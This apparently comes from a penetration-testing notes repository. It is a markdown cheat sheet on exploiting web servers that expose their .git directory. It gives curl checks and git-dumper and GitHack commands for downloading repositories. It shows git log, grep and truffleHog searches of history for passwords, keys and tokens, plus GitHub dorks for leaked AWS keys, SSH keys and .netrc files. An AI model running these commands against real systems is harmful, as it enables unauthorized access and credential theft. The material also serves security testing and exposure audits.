Skip to content

7.13.Git-Hacking.md

Latest commit

 

History

History
380 lines (271 loc) · 6.39 KB

7.13.Git-Hacking.md

File metadata and controls

380 lines (271 loc) · 6.39 KB

Git Hacking

Table of Contents

Detection

Quick Check (One-liner)

# Quick .git exposure check
curl -s http://$rhost/.git/HEAD | grep -q "ref:" && git-dumper http://$rhost/.git ./git-dump

Check for Exposed .git

# Test endpoints
curl -I http://$rhost/.git/HEAD
curl -I http://$rhost/.git/config
curl -I http://$rhost/.git/index

# Response with 200 = exposed
# Response with 403 = directory listing disabled but may still be exploitable

Common Indicators

Path Purpose
/.git/HEAD Current branch reference
/.git/config Repository configuration
/.git/index Staged files index
/.git/logs/HEAD Commit history
/.git/objects/ Git objects (commits, trees, blobs)

Manual Extraction

Step-by-Step

# 1. Check if .git is accessible
curl http://$rhost/.git/HEAD
# ref: refs/heads/master

# 2. Get config
curl http://$rhost/.git/config

# 3. Read logs
curl http://$rhost/.git/logs/HEAD

# 4. Download objects manually (if directory listing disabled)
# Object path: .git/objects/XX/XXXXXX (first 2 chars = folder)
curl http://$rhost/.git/objects/0d/6c16323262136f864d93604ac317dcaeaa3a62

Git Dumper Tools

GitTools (gitdumper.sh)

# Clone
git clone https://github.com/internetwache/GitTools.git
cd GitTools/Dumper

# Dump repository
./gitdumper.sh http://$rhost/.git/ output_dir

# Extract objects
cd output_dir
git checkout -- .

git-dumper (Python)

# Install
pip3 install git-dumper

# Dump
git-dumper http://$rhost/.git/ output_dir

# Navigate and analyze
cd output_dir
git log --oneline

GitHack

# Clone
git clone https://github.com/lijiejie/GitHack.git
cd GitHack

# Run
python3 GitHack.py http://$rhost/.git/

Git Analysis

View Commit History

cd cloned_repo

# View all commits
git log

# One-line format
git log --oneline

# Show all branches
git log --all --oneline --graph

Checkout Specific Commit

# Get commit ID from git log
git checkout <commit_id>

# Example
git checkout 0d6c16323262136f864d93604ac317dcaeaa3a62

# Restore all files from commit
git checkout -- .

View Changes Between Commits

# Show diff between commits
git diff <commit1> <commit2>

# Show what changed in specific commit
git show <commit_id>

# Show file content at specific commit
git show <commit_id>:path/to/file

Search for Secrets

# Search all history for keyword
git log -p | grep -i password
git log -p | grep -i secret
git log -p | grep -i api_key
git log -p | grep -i token

# Search in specific file history
git log -p -- config.php
git log -p -- .env

Sensitive Data Extraction

Files to Look For

# Configuration files
.env
config.php
settings.py
application.yml
web.config
appsettings.json

# Credential files
.htpasswd
.netrc
credentials.xml
secrets.yml

# Key files
id_rsa
id_dsa
*.pem
*.key

Extract Credentials from History

# Find deleted files
git log --diff-filter=D --summary | grep delete

# Recover deleted file
git log --all -- <deleted_file>
git show <commit_before_delete>:<file_path>

# Find files with passwords
git grep -n password $(git rev-list --all)
git grep -n secret $(git rev-list --all)

Using truffleHog

# Install
pip3 install truffleHog

# Scan for secrets
trufflehog git file://./cloned_repo

# Scan remote repo
trufflehog git https://github.com/user/repo.git

# With regex
trufflehog git file://./cloned_repo --regex --entropy=False

Using git-secrets

# Install
git clone https://github.com/awslabs/git-secrets.git
cd git-secrets && make install

# Scan repository
git secrets --scan
git secrets --scan-history

GitHub Dorking

Search Operators

# Find exposed passwords
filename:config password
filename:.env DB_PASSWORD
filename:wp-config.php

# Find API keys
filename:.npmrc _auth
filename:.dockercfg auth
extension:pem private

# Find credentials by domain
org:company password
user:username password

# Search in commit messages
committer:username password

Common Dorks

# Database credentials
filename:database.php password
filename:config.inc.php password

# AWS keys
AKIA extension:py
AKIA extension:sh

# SSH keys
filename:id_rsa
filename:id_dsa

# OAuth tokens
filename:.netrc password
filename:_netrc password

GitLab Exploitation

Exposed GitLab CI/CD Variables

# Check for .gitlab-ci.yml
curl http://$rhost/.gitlab-ci.yml

# CI variables might contain
# - AWS_SECRET_ACCESS_KEY
# - DEPLOY_PASSWORD
# - API_TOKEN

GitLab API

# Get project info (public)
curl https://gitlab.example.com/api/v4/projects

# Get user info
curl https://gitlab.example.com/api/v4/users?username=admin

Automated Scanning

Using Nuclei

nuclei -u http://$rhost -t exposures/configs/git-config.yaml
nuclei -u http://$rhost -t exposed-panels/git/

Using ffuf

# Check git paths
ffuf -u http://$rhost/FUZZ -w /usr/share/seclists/Discovery/Web-Content/git.txt -mc 200

Quick Reference

Task Command
Check exposure curl http://$rhost/.git/HEAD
Dump repo git-dumper http://$rhost/.git/ out
View commits git log --oneline
Checkout commit git checkout <id>
Search secrets git log -p | grep password
Recover deleted git show <commit>:<file>

Common Workflow

# 1. Detect
curl -I http://$rhost/.git/HEAD

# 2. Dump
git-dumper http://$rhost/.git/ repo

# 3. Analyze
cd repo
git log --oneline
git log -p | grep -iE 'password|secret|key|token'

# 4. Checkout interesting commits
git checkout <commit_id>
cat config.php

# 5. Check for deleted sensitive files
git log --diff-filter=D --summary
git show <commit>:<deleted_file>

📚 See Also

Related Web Attacks

Credential Exploitation